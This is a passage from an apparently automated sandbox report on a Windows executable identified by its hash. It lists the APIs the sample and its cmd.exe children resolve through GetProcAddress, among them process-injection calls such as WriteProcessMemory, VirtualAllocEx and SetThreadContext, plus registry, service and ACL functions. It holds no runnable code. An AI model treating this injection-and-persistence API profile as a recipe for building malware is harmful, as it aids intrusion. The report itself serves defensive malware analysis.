00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter GetSystemInfo (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter lstrcmpiA (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter lstrlenA (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter lstrcpynA (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter InterlockedExchange (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter GetCurrentThreadId (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter GetOverlappedResult (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter WaitForSingleObject (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter WriteFile (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter ReadFile (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter CreateFileA (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter DisconnectNamedPipe (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter ConnectNamedPipe (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter CreateNamedPipeA (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter GetEnvironmentVariableA (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter DeleteFileA (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter IsBadWritePtr (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter IsBadCodePtr (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter lstrcpyA (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter lstrcmpA (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter IsBadReadPtr (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter WriteProcessMemory (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter VirtualAllocEx (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter SetFilePointer (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter GetFileSize (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter SetFileAttributesA (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter GetDiskFreeSpaceA (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter GetWindowsDirectoryA (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter GetProcAddress (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter LocalFree (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter GetFileAttributesExA (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter LocalAlloc (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter CreateProcessA (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter GetTempPathA (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter SystemTimeToFileTime (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter GetSystemTime (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter DeviceIoControl (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter CreateFileW (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter GetModuleFileNameA (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter ResumeThread (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter SetThreadContext (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter GetThreadContext (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter lstrcatA (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter CreateThread (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter GetDriveTypeA (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter GetCommandLineA (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter SetUnhandledExceptionFilter (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter InterlockedIncrement (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter GetLocalTime (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter GetTimeZoneInformation (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter FileTimeToLocalFileTime (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter FileTimeToSystemTime (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter InterlockedDecrement (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter HeapSize (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter GetSystemTimeAsFileTime (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter MultiByteToWideChar (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter lstrlenW (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter GetStartupInfoW (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter GetProcessHeap (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter HeapAlloc (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter HeapReAlloc (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter HeapFree (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter FreeLibrary (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter CreateEventA (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter GetSystemDirectoryA (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter wsprintfA (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter CharToOemA (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter ConvertSidToStringSidA (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter AllocateAndInitializeSid (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter CreateProcessWithLogonW (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter RegCreateKeyExA (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter StartServiceCtrlDispatcherA (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter RegisterServiceCtrlHandlerA (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter SetServiceStatus (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter RegDeleteValueA (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter RegGetKeySecurity (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter RegSetKeySecurity (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter RegSetValueExA (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter GetLengthSid (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter GetFileSecurityA (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter GetSecurityDescriptorOwner (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter EqualSid (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter InitializeSecurityDescriptor (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter SetSecurityDescriptorOwner (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter SetFileSecurityA (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter GetSecurityDescriptorDacl (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter GetAce (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter DeleteAce (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter SetSecurityDescriptorDacl (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExA (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter RegEnumKeyA (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExA (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter RegEnumValueA (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter GetUserNameW (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter LookupAccountNameW (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter LookupAccountNameA (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter GetUserNameA (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter CheckTokenMembership (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter FreeSid (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter ShellExecuteA (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter ShellExecuteExW (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter atexit (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter GetSystemWow64DirectoryA (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter _allmul (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter SHGetInstanceExplorer (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter OleInitialize (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter ThemeInitApiHook (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter IsProcessDPIAware (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter CoTaskMemAlloc (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter RegisterTraceGuidsW (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter EventRegister (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter EventUnregister (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter EventEnabled (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter EventWrite (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockShared (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockShared (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter EventSetInformation (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter InitCommonControlsEx (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExW (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter SetEntriesInAclW (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter GetMartaExtensionInterface (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter RegGetValueW (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter CoCreateInstance (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter OpenProcessToken (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter RegisterTraceGuidsA (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter GetUserNameExW (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter PathCreateFromUrlW (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter SHGetFolderPathW (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter OleUninitialize (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter UnregisterTraceGuids (UID: 00000000-00005996)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00005772)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00005772)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00005772)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00005772)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00005772)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00005772)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00005772)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00005772)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00005772)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00005772)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00005772)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00005772)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00005772)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00005772)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00005772)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00005772)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00005772)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00005772)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00005772)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00005772)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00005772)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00005772)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00005772)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00005772)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00005772)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00005772)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00005772)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00005772)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00005772)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00005772)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00005772)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00005772)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00005772)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00005772)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00005772)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00005772)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00005772)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00005772)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00005772)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00005772)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00005772)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00005772)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CopyFileExW (UID: 00000000-00005772)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter IsDebuggerPresent (UID: 00000000-00005772)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SetConsoleInputExeNameW (UID: 00000000-00005772)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00005964)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00005964)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00005964)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00005964)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00005964)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00005964)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00005964)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00005964)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00005964)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00005964)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00005964)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00005964)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00005964)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00005964)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00005964)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00005964)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00005964)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00005964)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00005964)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00005964)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00005964)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00005964)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00005964)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00005964)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00005964)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00005964)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00005964)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00005964)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00005964)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00005964)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00005964)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00005964)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00005964)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00005964)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00005964)\n \"cmd.exe\" 